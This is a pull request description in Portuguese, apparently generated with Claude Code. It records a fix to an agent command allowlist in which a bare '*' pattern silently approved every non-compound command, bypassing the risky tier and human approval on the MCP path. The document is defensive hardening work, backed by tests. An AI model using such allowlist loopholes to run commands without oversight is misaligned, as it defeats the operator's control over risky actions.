Sincronizado o branch com a main (merge `d9de513`), code-review e
security-auditor re-rodaram no head. **Os dois convergiram no mesmo achado**:
o padrão `"*"` puro passava pela construção — tem coringa no fim, então era
"válido" — e virava prefixo vazio no `strip_suffix`: `starts_with("")` casa
com **todo** comando não composto. Um caractere na lista era o tier arriscado
desligado; no caminho MCP, onde não existe humano no circuito, era execução
automática de tudo que a denylist não pega.

Corrigido em `50a5e91`: `"*"` (e `" *"` — coringa sem prefixo de verdade) é
recusado na construção com warning, junto com padrão vazio e coringa fora do
fim. O teste novo (`estrela_solta_nao_vira_bypass_blanket`) prende as duas
pontas: a recusa (allowlist fica vazia) **e** o pior caso visto de fora — um
comando arriscado listado assim continua barrado fail-closed. Confirmado
não-vacuo: guarda desligada, o teste fica vermelho.

O que a re-auditoria aprovou no mesmo veredito: o guarda de comando composto
está completo (nenhum bypass por casing, trim, aspas, tab ou NUL); a
precedência denylist → allowlist → tier é coerente com a regra do #1075 (a
allowlist é autorização estática do operador, distinta da aprovação derivada
de conversa); o MEDIUM do caminho MCP segue declarado no
`config.hardened.example.yml`; prefixos largos como `"git *"` seguem como
risco residual documentado.

### Rodada 2 (df8f087): o coringa escondido no prefixo

A re-revisão de código achou que `strip_suffix('*')` tira só o **último**
coringa: `"git **"` e `"*git*"` passavam pelo filtro com um `*` vivo dentro
do prefixo — coringa no meio de novo, contradizendo a sintaxe documentada e
casando literal de forma surpresa. Não era bypass novo (o prefixo com `*`
casa literalmente), mas era configuração inválida aceita em silêncio no
mesmo filtro que é superfície de segurança.

Corrigido em `df8f087`: o prefixo de um padrão válido não pode conter `*`.
Teste `coringa_fora_do_fim_e_recusado` estendido com os dois padrões — só o
padrão de coringa único no fim sobrevive. Não-vacuo confirmado da mesma
forma.

## Verificação

- `cargo fmt --all -- --check` — limpo
- `cargo clippy -p garraia-config -p garraia-agents -p garraia-gateway -p garraia --all-targets -- -D warnings` — limpo
- `cargo test -p garraia-agents --lib` — **361 passed** (10 testes do #1105)
- `cargo test -p garraia --bins` — **472 passed**

Closes #1105

🤖 Generated with [Claude Code](https://claude.com/claude-code)
